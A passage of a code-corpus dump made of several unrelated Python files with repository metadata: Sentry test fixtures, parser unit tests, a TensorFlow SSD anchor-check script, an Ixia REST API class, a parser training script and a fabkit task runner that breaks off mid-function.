useremail.save()
return useremail
def create_event(self, event_id=None, **kwargs):
if event_id is None:
event_id = uuid4().hex
if 'group' not in kwargs:
kwargs['group'] = self.group
kwargs.setdefault('project', kwargs['group'].project)
kwargs.setdefault('data', copy.deepcopy(DEFAULT_EVENT_DATA))
kwargs.setdefault('platform', kwargs['data'].get('platform', 'python'))
kwargs.setdefault('message', kwargs['data'].get('message', 'message'))
if kwargs.get('tags'):
tags = kwargs.pop('tags')
if isinstance(tags, dict):
tags = list(tags.items())
kwargs['data']['tags'] = tags
if kwargs.get('stacktrace'):
stacktrace = kwargs.pop('stacktrace')
kwargs['data']['stacktrace'] = stacktrace
kwargs['data'].setdefault(
'errors', [{
'type': EventError.INVALID_DATA,
'name': 'foobar',
}]
)
# maintain simple event fixtures by supporting the legacy message
# parameter just like our API would
if 'logentry' not in kwargs['data']:
kwargs['data']['logentry'] = {
'message': kwargs.get('message') or '<unlabeled event>',
}
if 'type' not in kwargs['data']:
kwargs['data'].update(
{
'type': 'default',
'metadata': {
'title': kwargs['data']['logentry']['message'],
},
}
)
kwargs['data'] = CanonicalKeyDict(kwargs.pop('data'))
event = Event(event_id=event_id, **kwargs)
EventMapping.objects.create(
project_id=event.project.id,
event_id=event_id,
group=event.group,
)
# emulate EventManager refs
event.data.bind_ref(event)
event.save()
return event
def create_full_event(self, event_id='a', **kwargs):
payload = """
{
"id": "f5dd88e612bc406ba89dfebd09120769",
"project": 11276,
"release": "e1b5d1900526feaf20fe2bc9cad83d392136030a",
"platform": "javascript",
"culprit": "app/components/events/eventEntries in map",
"message": "TypeError: Cannot read property '1' of null",
"tags": [
["environment", "prod"],
["sentry_version", "e1b5d1900526feaf20fe2bc9cad83d392136030a"],
["level", "error"],
["logger", "javascript"],
["sentry:release", "e1b5d1900526feaf20fe2bc9cad83d392136030a"],
["browser", "Chrome 48.0"],
["device", "Other"],
["os", "Windows 10"],
["url", "https://sentry.io/katon-direct/localhost/issues/112734598/"],
["sentry:user", "id:41656"]
],
"errors": [{
"url": "<anonymous>",
"type": "js_no_source"
}],
"extra": {
"session:duration": 40364
},
"exception": {
"exc_omitted": null,
"values": [{
"stacktrace": {
"frames": [{
"function": "batchedUpdates",
"abs_path": "webpack:////usr/src/getsentry/src/sentry/~/react/lib/ReactUpdates.js",
"pre_context": [" // verify that that's the case. (This is called by each top-level update", " // function, like setProps, setState, forceUpdate, etc.; creation and", " // destruction of top-level components is guarded in ReactMount.)", "", " if (!batchingStrategy.isBatchingUpdates) {"],
"post_context": [" return;", " }", "", " dirtyComponents.push(component);", "}"],
"filename": "~/react/lib/ReactUpdates.js",
"module": "react/lib/ReactUpdates",
"colno": 0,
"in_app": false,
"data": {
"orig_filename": "/_static/29e365f8b0d923bc123e8afa38d890c3/sentry/dist/vendor.js",
"orig_abs_path": "https://media.sentry.io/_static/29e365f8b0d923bc123e8afa38d890c3/sentry/dist/vendor.js",
"sourcemap": "https://media.sentry.io/_static/29e365f8b0d923bc123e8afa38d890c3/sentry/dist/vendor.js.map",
"orig_lineno": 37,
"orig_function": "Object.s [as enqueueUpdate]",
"orig_colno": 16101
},
"context_line": " batchingStrategy.batchedUpdates(enqueueUpdate, component);",
"lineno": 176
}],
"frames_omitted": null
},
"type": "TypeError",
"value": "Cannot read property '1' of null",
"module": null
}]
},
"request": {
"url": "https://sentry.io/katon-direct/localhost/issues/112734598/",
"headers": [
["Referer", "https://sentry.io/welcome/"],
["User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"]
]
},
"user": {
"ip_address": "0.0.0.0",
"id": "41656",
"email": "test@example.com"
},
"version": "7",
"breadcrumbs": {
"values": [
{
"category": "xhr",
"timestamp": 1496395011.63,
"type": "http",
"data": {
"url": "/api/path/here",
"status_code": "500",
"method": "POST"
}
}
]
}
}"""
return self.create_event(event_id=event_id, platform='javascript',
data=json.loads(payload))
def create_group(self, project=None, checksum=None, **kwargs):
if checksum:
warnings.warn('Checksum passed to create_group', DeprecationWarning)
if project is None:
project = self.project
kwargs.setdefault('message', 'Hello world')
kwargs.setdefault('data', {})
if 'type' not in kwargs['data']:
kwargs['data'].update(
{
'type': 'default',
'metadata': {
'title': kwargs['message'],
},
}
)
if 'short_id' not in kwargs:
kwargs['short_id'] = project.next_short_id()
return Group.objects.create(project=project, **kwargs)
def create_file(self, **kwargs):
return File.objects.create(**kwargs)
def create_file_from_path(self, path, name=None, **kwargs):
if name is None:
name = os.path.basename(path)
file = self.create_file(name=name, **kwargs)
with open(path) as f:
file.putfile(f)
return file
def create_event_attachment(self, event=None, file=None, **kwargs):
if event is None:
event = self.event
if file is None:
file = self.create_file(
name='log.txt',
size=32,
headers={'Content-Type': 'text/plain'},
checksum='dc1e3f3e411979d336c3057cce64294f3420f93a',
)
return EventAttachment.objects.create(
project_id=event.project_id,
group_id=event.group_id,
event_id=event.event_id,
file=file,
**kwargs
)
def create_dif_file(self, debug_id=None, project=None, object_name=None,
features=None, data=None, file=None, cpu_name=None, **kwargs):
if project is None:
project = self.project
if debug_id is None:
debug_id = six.text_type(uuid4())
if object_name is None:
object_name = '%s.dSYM' % debug_id
if features is not None:
if data is None:
data = {}
data['features'] = features
if file is None:
file = self.create_file(
name=object_name,
size=42,
headers={'Content-Type': 'application/x-mach-binary'},
checksum='dc1e3f3e411979d336c3057cce64294f3420f93a',
)
return ProjectDebugFile.objects.create(
debug_id=debug_id,
project=project,
object_name=object_name,
cpu_name=cpu_name or 'x86_64',
file=file,
data=data,
**kwargs
)
return ProjectDebugFile.objects.create(project=project, **kwargs)
def create_dif_from_path(self, path, object_name=None, **kwargs):
if object_name is None:
object_name = os.path.basename(path)
headers = {'Content-Type': 'application/x-mach-binary'}
file = self.create_file_from_path(path, name=object_name, headers=headers)
return self.create_dif_file(file=file, object_name=object_name, **kwargs)
def add_user_permission(self, user, permission):
try:
with transaction.atomic():
UserPermission.objects.create(user=user, permission=permission)
except IntegrityError:
raise
def create_sentry_app(self, name=None, organization=None, published=False, scopes=(),
webhook_url=None, **kwargs):
if not name:
name = 'Test App'
if not organization:
organization = self.create_organization()
if not webhook_url:
webhook_url = 'https://example.com/webhook'
app = SentryAppCreator.run(
name=name,
organization=organization,
scopes=scopes,
webhook_url=webhook_url,
**kwargs
)
if published:
app.update(status=SentryAppStatus.PUBLISHED)
return app
def create_service_hook(self, actor=None, project=None, events=None, url=None, **kwargs):
if not actor:
actor = self.create_user()
if not project:
org = self.create_organization(owner=actor)
project = self.create_project(organization=org)
if not events:
events = ('event.created',)
if not url:
url = 'https://example/sentry/webhook'
return ServiceHookCreator.run(
actor=actor,
project=project,
events=events,
url=url,
**kwargs
)
| 35.683646
| 324
| 0.502254
|
85f6043b210fe316644b8a71ab52d2f73bd2aa5a
| 3,657
|
py
|
Python
|
tests/test_parser.py
|
genejiang2012/iTest_httpapi_v2
|
5edfff2e068ce9b031a9c990c1bfcbfca25469d5
|
[
"MIT"
] | null | null | null |
tests/test_parser.py
|
genejiang2012/iTest_httpapi_v2
|
5edfff2e068ce9b031a9c990c1bfcbfca25469d5
|
[
"MIT"
] | null | null | null |
tests/test_parser.py
|
genejiang2012/iTest_httpapi_v2
|
5edfff2e068ce9b031a9c990c1bfcbfca25469d5
|
[
"MIT"
] | null | null | null |
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2021/1/6 19:29
# @Author : Gene Jiang
# @File : test_parser.py.py
# @Description:
import pytest
from httpapi import parser
from loguru import logger
def test_parse_string_value():
assert parser.parse_string_value("123") == 123
assert parser.parse_string_value("12.2") == 12.2
assert parser.parse_string_value("abc") == "abc"
assert parser.parse_string_value("$var") == "$var"
def test_extract_variables():
assert parser.extract_variables("$var") == {"var"}
assert parser.extract_variables("$var123") == {"var123"}
assert parser.extract_variables("$var_name") == {"var_name"}
assert parser.extract_variables("var") == set()
assert parser.extract_variables("a$var") == {"var"}
assert parser.extract_variables("$v ar") == {"v"}
assert parser.extract_variables(" ") == set()
assert parser.extract_variables("$abc*") == {"abc"}
assert parser.extract_variables("${func()}") == set()
assert parser.extract_variables("${func(1,2)}") == set()
assert parser.extract_variables("${gen_md5($TOKEN, $data, $random)}") == {
"TOKEN", "data", "random"}
assert parser.extract_variables("Z:2>1*0*1+1$$1") == set()
def test_parse_data():
variables_mapping = {
"var_1": "abc",
"var_2": "def",
"var_3": 123,
"var_4": {"a": 1},
"var_5": True,
"var_6": None
}
assert parser.parse_data("$var_1", variables_mapping) == "abc"
assert parser.parse_data("${var_1}", variables_mapping) == "abc"
assert parser.parse_data("var_1", variables_mapping) == "var_1"
assert parser.parse_data("$var_1#XYZ", variables_mapping) == "abc#XYZ"
assert parser.parse_data("${var_1}#XYZ", variables_mapping) == "abc#XYZ"
assert parser.parse_data("/$var_1/$var_2/var3",
variables_mapping) == "/abc/def/var3"
assert parser.parse_data("$var_3", variables_mapping) == 123
assert parser.parse_data("$var_4", variables_mapping) == {"a": 1}
assert parser.parse_data("$var_5", variables_mapping) == True
assert parser.parse_data("abc$var_5", variables_mapping) == 'abcTrue'
assert parser.parse_data("abc$var_4", variables_mapping) == "abc{'a': 1}"
assert parser.parse_data("$var_6", variables_mapping) == None
assert parser.parse_data("/api/$var_1", variables_mapping) == "/api/abc"
assert parser.parse_data(["$var_1", "$var_2"], variables_mapping) == ["abc",
"def"]
assert parser.parse_data({"$var_1": "$var_2"}, variables_mapping) == {"abc":
"def"}
assert parser.parse_data("ABC$var_1", variables_mapping) == "ABCabc"
assert parser.parse_data("ABC${var_1}", variables_mapping) == "ABCabc"
assert parser.parse_data("ABC${var_1}/123${var_1}/456",
variables_mapping) == "ABCabc/123abc/456"
assert parser.parse_data("func1(${var_1}, ${var_3})",
variables_mapping) == "func1(abc, 123)"
def test_parse_string():
assert parser.parse_string("abc${add_one($num}def", {"num": 3},
{"add_one": lambda x: x + 1}) == "abc4def"
def test_parse_variable_mapping():
variables = {"varA": "$varB", "varB": "$varC", "varC": "123", "a": 1,
"b": 2}
parsed_variable = parser.parse_variable_mapping(variables)
logger.info(f"The parsed value is {parsed_variable}")
assert parsed_variable["varA"] == "123"
assert parsed_variable["varB"] == "123"
| 43.535714
| 84
| 0.604047
|
19b41eb32f2547b422f2cdf98e7d14d99eb88593
| 7,060
|
py
|
Python
|
testcodes/check_encoding.py
|
Intel-tensorflow/SSD_tensorflow_VOC
|
839c4291926e4c9f2cf5e028d666766daa873b7c
|
[
"Apache-2.0"
] | 70
|
2017-04-27T03:42:18.000Z
|
2022-02-19T06:55:48.000Z
|
testcodes/check_encoding.py
|
Intel-tensorflow/SSD_tensorflow_VOC
|
839c4291926e4c9f2cf5e028d666766daa873b7c
|
[
"Apache-2.0"
] | 33
|
2017-04-26T01:48:40.000Z
|
2021-06-11T02:21:34.000Z
|
testcodes/check_encoding.py
|
Intel-tensorflow/SSD_tensorflow_VOC
|
839c4291926e4c9f2cf5e028d666766daa873b7c
|
[
"Apache-2.0"
] | 32
|
2017-07-13T12:58:04.000Z
|
2021-05-17T08:41:46.000Z
|
from datasets import pascalvoc_datasets
import tensorflow as tf
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
# from nets import nets_factory
from preprocessing import preprocessing_factory
import numpy as np
import cv2
from utility import visualization
from nets.ssd import g_ssd_model
from preprocessing.ssd_vgg_preprocessing import np_image_unwhitened
from preprocessing.ssd_vgg_preprocessing import preprocess_for_train
from preprocessing.ssd_vgg_preprocessing import preprocess_for_eval
import tf_utils
import math
class CheckEncoding(object):
def __init__(self):
self.batch_size = 32
return
def __preprocess_data(self, image, labels, bboxes):
out_shape = g_ssd_model.img_shape
if self.is_training_data:
image, labels, bboxes = preprocess_for_train(image, labels, bboxes, out_shape = out_shape)
else:
image, labels, bboxes, _ = preprocess_for_eval(image, labels, bboxes, out_shape = out_shape)
return image, labels, bboxes
def __get_images_labels_bboxes(self,data_sources, num_samples,is_training_data):
self.dataset = pascalvoc_datasets.get_dataset_info(data_sources, num_samples)
self.is_training_data = is_training_data
if self.is_training_data:
shuffle = True
#make sure most samples can be fetched in one epoch
self.num_readers = 2
else:
#make sure data is fetchd in sequence
shuffle = False
self.num_readers = 1
provider = slim.dataset_data_provider.DatasetDataProvider(
self.dataset,
shuffle=shuffle,
num_readers=self.num_readers,
common_queue_capacity=30 * self.batch_size,
common_queue_min=10 * self.batch_size)
# Get for SSD network: image, labels, bboxes.
[image, shape, format, self.filename, glabels, gbboxes,gdifficults] = provider.get(['image', 'shape', 'format','filename',
'object/label',
'object/bbox',
'object/difficult'])
# Pre-processing image, labels and bboxes.
self.image, self.glabels, self.gbboxes = self.__preprocess_data(image, glabels, gbboxes)
# anchors_1 = g_ssd_model.get_allanchors(minmaxformat=False)
anchors = g_ssd_model.get_allanchors(minmaxformat=True)
print(anchors[-1][-4:])
#flattent the anchors
temp_anchors = []
for i in range(len(anchors)):
temp_anchors.append(tf.reshape(anchors[i], [-1, 4]))
anchors = tf.concat(temp_anchors, axis=0)
self.jaccard = g_ssd_model.compute_jaccard(self.gbboxes, anchors)
# Assign groundtruth information for all default/anchor boxes
# gclasses, glocalisations, gscores = g_ssd_model.tf_ssd_bboxes_encode(glabels, gbboxes)
return
def __disp_image(self, img, classes, bboxes):
bvalid = (classes !=0)
classes = classes[bvalid]
bboxes = bboxes[bvalid]
scores =np.full(classes.shape, 1.0)
visualization.plt_bboxes(img, classes, scores, bboxes,title='Ground Truth')
return
def __disp_matched_anchors(self,img, target_labels_data, target_localizations_data, target_scores_data):
found_matched = False
all_anchors = g_ssd_model.get_allanchors()
for i, target_score_data in enumerate(target_scores_data):
num_pos = (target_score_data > 0.5).sum()
if (num_pos == 0):
continue
print('Found {} matched default boxes in layer {}'.format(num_pos,g_ssd_model.feat_layers[i]))
pos_sample_inds = (target_score_data > 0.5).nonzero()
pos_sample_inds = [pos_sample_inds[0],pos_sample_inds[1],pos_sample_inds[2]]
classes = target_labels_data[i][pos_sample_inds]
scores = target_scores_data[i][pos_sample_inds]
bboxes_default= g_ssd_model.get_allanchors(minmaxformat=True)[i][pos_sample_inds]
bboxes_gt = g_ssd_model.decode_bboxes_layer(target_localizations_data[i][pos_sample_inds],
all_anchors[i][pos_sample_inds])
print("default box minimum, {} gt box minimum, {}".format(bboxes_default.min(), bboxes_gt.min()))
marks_default = np.full(classes.shape, True)
marks_gt = np.full(classes.shape, False)
scores_gt = np.full(scores.shape, 1.0)
bboxes = bboxes_default
neg_marks = marks_default
add_gt = True
if add_gt :
bboxes = np.vstack([bboxes_default,bboxes_gt])
neg_marks = np.hstack([marks_default,marks_gt])
classes = np.tile(classes, 2)
scores = np.hstack([scores, scores_gt])
title = "Default boxes: Layer {}".format(g_ssd_model.feat_layers[i])
visualization.plt_bboxes(img, classes, scores, bboxes,neg_marks=neg_marks,title=title)
found_matched = True
return found_matched
def get_voc_2007_test_data(self):
data_sources = "../../data/voc/tfrecords/voc_test_2007*.tfrecord"
num_samples = pascalvoc_datasets.DATASET_SIZE['2007_test']
return self.__get_images_labels_bboxes(data_sources, num_samples, False)
def run(self):
with tf.Graph().as_default():
self.get_voc_2007_test_data()
with tf.Session('') as sess:
init = tf.global_variables_initializer()
sess.run(init)
with slim.queues.QueueRunners(sess):
image, glabels, gbboxes,filename,jaccard= sess.run([self.image, self.glabels, self.gbboxes,self.filename,self.jaccard])
print(filename)
print(glabels)
print(gbboxes)
print(jaccard)
#selet the first image in the batch
image_data = np_image_unwhitened(image)
self.__disp_image(image_data, glabels, gbboxes)
# found_matched = self.__disp_matched_anchors(image_data,target_labels_data, target_localizations_data, target_scores_data)
plt.show()
return
if __name__ == "__main__":
obj= CheckEncoding()
obj.run()
| 39.222222
| 167
| 0.581586
|
8f6b46fa12249e3c73350c1756f92cbce7eda900
| 8,828
|
py
|
Python
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/trafficitem/applibprofile/applibflow/applibflow.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 20
|
2019-05-07T01:59:14.000Z
|
2022-02-11T05:24:47.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/trafficitem/applibprofile/applibflow/applibflow.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 60
|
2019-04-03T18:59:35.000Z
|
2022-02-22T12:05:05.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/trafficitem/applibprofile/applibflow/applibflow.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 13
|
2019-05-20T10:48:31.000Z
|
2021-10-06T07:45:44.000Z
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class AppLibFlow(Base):
"""This object specifies the particular application library flow related properties.
The AppLibFlow class encapsulates a list of appLibFlow resources that are managed by the system.
A list of resources can be retrieved from the server using the AppLibFlow.find() method.
"""
__slots__ = ()
_SDM_NAME = 'appLibFlow'
_SDM_ATT_MAP = {
'ConfigId': 'configId',
'ConnectionCount': 'connectionCount',
'Description': 'description',
'FlowId': 'flowId',
'FlowSize': 'flowSize',
'Name': 'name',
'Parameters': 'parameters',
'Percentage': 'percentage',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(AppLibFlow, self).__init__(parent, list_op)
@property
def Connection(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.traffic.trafficitem.applibprofile.applibflow.connection.connection.Connection): An instance of the Connection class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.traffic.trafficitem.applibprofile.applibflow.connection.connection import Connection
if self._properties.get('Connection', None) is not None:
return self._properties.get('Connection')
else:
return Connection(self)
@property
def Parameter(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.traffic.trafficitem.applibprofile.applibflow.parameter.parameter.Parameter): An instance of the Parameter class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.traffic.trafficitem.applibprofile.applibflow.parameter.parameter import Parameter
if self._properties.get('Parameter', None) is not None:
return self._properties.get('Parameter')
else:
return Parameter(self)
@property
def ConfigId(self):
# type: () -> int
"""
Returns
-------
- number: The internal config id asociated with this flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConfigId'])
@property
def ConnectionCount(self):
# type: () -> int
"""
Returns
-------
- number: Number of connections in this flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectionCount'])
@property
def Description(self):
# type: () -> str
"""
Returns
-------
- str: Brief description of what the flow does.
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def FlowId(self):
# type: () -> str
"""
Returns
-------
- str: The identifier of the flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['FlowId'])
@property
def FlowSize(self):
# type: () -> int
"""
Returns
-------
- number: The size of the flow in bytes.
"""
return self._get_attribute(self._SDM_ATT_MAP['FlowSize'])
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: the name of the Flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@property
def Parameters(self):
# type: () -> List[str]
"""
Returns
-------
- list(str): Array containing configurable parameters per flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['Parameters'])
@property
def Percentage(self):
# type: () -> int
"""
Returns
-------
- number: The amount of traffic generated for this flows.
"""
return self._get_attribute(self._SDM_ATT_MAP['Percentage'])
@Percentage.setter
def Percentage(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Percentage'], value)
def update(self, Percentage=None):
# type: (int) -> AppLibFlow
"""Updates appLibFlow resource on the server.
Args
----
- Percentage (number): The amount of traffic generated for this flows.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, Percentage=None):
# type: (int) -> AppLibFlow
"""Adds a new appLibFlow resource on the json, only valid with config assistant
Args
----
- Percentage (number): The amount of traffic generated for this flows.
Returns
-------
- self: This instance with all currently retrieved appLibFlow resources using find and the newly added appLibFlow resources available through an iterator or index
Raises
------
- Exception: if this function is not being used with config assistance
"""
return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, ConfigId=None, ConnectionCount=None, Description=None, FlowId=None, FlowSize=None, Name=None, Parameters=None, Percentage=None):
# type: (int, int, str, str, int, str, List[str], int) -> AppLibFlow
"""Finds and retrieves appLibFlow resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve appLibFlow resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all appLibFlow resources from the server.
Args
----
- ConfigId (number): The internal config id asociated with this flow.
- ConnectionCount (number): Number of connections in this flow.
- Description (str): Brief description of what the flow does.
- FlowId (str): The identifier of the flow.
- FlowSize (number): The size of the flow in bytes.
- Name (str): the name of the Flow.
- Parameters (list(str)): Array containing configurable parameters per flow.
- Percentage (number): The amount of traffic generated for this flows.
Returns
-------
- self: This instance with matching appLibFlow resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of appLibFlow data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the appLibFlow resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| 35.740891
| 178
| 0.63763
|
ebaab48b55047f50262ec3ded87c7486a1fd5ca2
| 1,406
|
py
|
Python
|
test/script/train_embedding_psd_id.py
|
emorynlp/bert-2018
|
228b2046d92084ea3cd7c900c1d8af1f0a925cfe
|
[
"Apache-2.0"
] | 17
|
2019-08-15T01:49:10.000Z
|
2022-03-28T19:12:04.000Z
|
test/script/train_embedding_psd_id.py
|
emorynlp/bert-2018
|
228b2046d92084ea3cd7c900c1d8af1f0a925cfe
|
[
"Apache-2.0"
] | 2
|
2020-09-09T02:30:23.000Z
|
2022-03-28T19:57:21.000Z
|
test/script/train_embedding_psd_id.py
|
emorynlp/bert-2018
|
228b2046d92084ea3cd7c900c1d8af1f0a925cfe
|
[
"Apache-2.0"
] | 1
|
2020-03-12T03:41:13.000Z
|
2020-03-12T03:41:13.000Z
|
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from bertsota.parser.dep_parser import SDPParser
if __name__ == '__main__':
save_dir = 'data/model/train-embedding-psd-id'
parser = SDPParser()
parser.train(train_file='data/semeval15/en.psd.conllu',
dev_file='data/semeval15/en.id.psd.conllu',
test_file='data/semeval15/en.id.psd.conllu',
save_dir=save_dir,
pretrained_embeddings_file='data/embedding/glove.6B.100d.txt')
parser.load(save_dir)
parser.evaluate(test_file='data/semeval15/en.id.psd.conllu', save_dir=save_dir,
num_buckets_test=10)
| 42.606061
| 83
| 0.720484
|
a7df44e1e30700bec201dcf9d8da87ea93513b02
| 12,665
|
py
|
Python
|
core/setup/base.py
|
fabrickit/fabkit
|
ca099c7e543efb8f5c1d19453c8ceada0584e563
|
[
"MIT"
] | null | null | null |
core/setup/base.py
|
fabrickit/fabkit
|
ca099c7e543efb8f5c1d19453c8ceada0584e563
|
[
"MIT"
] | null | null | null |
core/setup/base.py
|
fabrickit/fabkit
|
ca099c7e543efb8f5c1d19453c8ceada0584e563
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from fabkit import env, api, status, log, util
import re
from types import DictType
import inspect
from oslo_config import cfg
CONF = cfg.CONF
@api.task
def manage(*args, **kwargs):
run_func(args, *args, **kwargs)
@api.task
def check(*args, **kwargs):
run_func(['^check.*'], *args, **kwargs)
@api.task
def setup(*args, **kwargs):
run_func(['^setup.*'], *args, **kwargs)
def run_func(func_names=[], *args, **kwargs):
fabrun_filter = []
is_filter = False
env.is_test = False
env.is_help = False
if len(args) > 0:
if args[0] == 'test':
env.is_test = True
args = args[1:]
elif args[0] == 'help':
env.is_help = True
args = args[1:]
if 'f' in kwargs:
fabrun_filter = kwargs['f'].split('+')
fabrun_filter = [re.compile(f) for f in fabrun_filter]
is_filter = True
func_patterns = [re.compile(name) for name in func_names]
host_filter = {}
for run in env.runs:
cluster_name = run['cluster']
cluster = env.cluster_map[run['cluster']]
env.cluster = cluster
log.init_logger(cluster_name)
for cluster_run in run['runs']:
run_results = []
script_name = cluster_run['fabscript']
if is_filter:
for f in fabrun_filter:
if f.search(script_name):
break
else:
continue
if env.is_check or env.is_manage:
# 二重実行を防ぐ
hosts = host_filter.get(script_name, [])
tmp_hosts = list(set(cluster_run['hosts']) - set(hosts))
cluster_run['hosts'] = tmp_hosts
hosts.extend(tmp_hosts)
host_filter[script_name] = hosts
if len(cluster_run['hosts']) == 0:
continue
hosts = []
for host in cluster_run['hosts']:
env.node_map[host] = env.node_map.get(host, {
'host': host,
'bootstrap_status': -1,
})
if env.node_map[host]['bootstrap_status'] != status.FAILED_CHECK:
hosts.append(host)
env.script_name = script_name
env.hosts = hosts
# override env
override_env = env.cluster.get('env', {})
override_env.update(cluster_run.get('env', {}))
default_env = {}
for key, value in override_env.items():
default_env[key] = getattr(env, key, None)
setattr(env, key, value)
env.cluster_status = env.cluster['__status']
env.node_status_map = env.cluster_status['node_map']
env.fabscript_status_map = env.cluster_status['fabscript_map']
env.fabscript = env.fabscript_status_map[script_name]
log.info('hosts: {0}'.format(env.hosts))
log.info('run: {0}: {1}'.format(script_name, env.fabscript))
log.debug('node_status_map: {0}'.format(env.node_status_map))
# check require
require = env.cluster['fabscript_map'][script_name]['require']
if env.is_setup:
is_require = True
for script, status_code in require.items():
required_status = env.fabscript_status_map[script]['status']
if required_status != status_code:
log.error('Require Error\n'
+ '{0} is require {1}:{2}.\nbut {1} status is {3}.'.format(
script_name, script, status_code, required_status))
is_require = False
break
if not is_require:
break
script = '.'.join([CONF.fabscript_module, script_name.replace('/', '.')])
# importlibは、2.7以上じゃないと使えない
# module = importlib.import_module(script)
module = __import__(script, globals(), locals(), ['*'], -1)
module_funcs = []
for member in inspect.getmembers(module):
if inspect.isfunction(member[1]):
module_funcs.append(member[0])
if env.is_help and len(func_patterns) == 0:
for candidate in module_funcs:
func = getattr(module, candidate)
print 'Task: {0}'.format(func.__name__)
print func.__doc__
continue
# func_patterns にマッチしたタスク関数をすべて実行する
is_expected = False
is_contain_unexpected = False
for func_pattern in func_patterns:
for candidate in module_funcs:
if not func_pattern.match(candidate):
continue
func = getattr(module, candidate)
# taskデコレータの付いているものだけ実行する
if not hasattr(func, 'is_task') or not func.is_task:
continue
if env.is_help:
print 'Task: {0}'.format(func.__name__)
print func.__doc__
continue
results = api.execute(func, *args, **kwargs)
# check results
data_map = {}
tmp_status = None
is_contain_failed = False
for host, result in results.items():
env.node_map[host].update(result['node'])
if not result or type(result) is not DictType:
result = {}
node_result = env.node_status_map[host]['fabscript_map'][script_name]
result_status = result.get('status')
task_status = result.get('task_status', status.SUCCESS)
msg = result.get('msg')
if msg is None:
if task_status is status.SUCCESS:
msg = status.FABSCRIPT_SUCCESS_MSG
else:
msg = status.FABSCRIPT_FAILED_MSG
if func.is_bootstrap:
if task_status == status.FAILED_CHECK or \
task_status == status.FAILED_CHECK_PING:
env.node_map[host]['bootstrap_status'] = status.FAILED_CHECK
else:
env.node_map[host]['bootstrap_status'] = status.SUCCESS
node_result['task_status'] = task_status
tmp_data_map = result.get('data_map')
if tmp_data_map is not None:
for map_name, tmp_map_data in tmp_data_map.items():
if tmp_map_data['type'] == 'table':
map_data = data_map.get(map_name, {
'name': map_name,
'type': 'table',
'data': [],
})
tmp_data = {'!!host': host}
tmp_data.update(tmp_map_data['data'])
map_data['data'].append(tmp_data)
data_map[map_name] = map_data
elif tmp_map_data['type'] == 'multi-table':
map_data = data_map.get(map_name, {
'name': map_name,
'type': 'multi-table',
'data': [],
})
tmp_data = {'!!host': host}
tmp_data.update(tmp_map_data['data'])
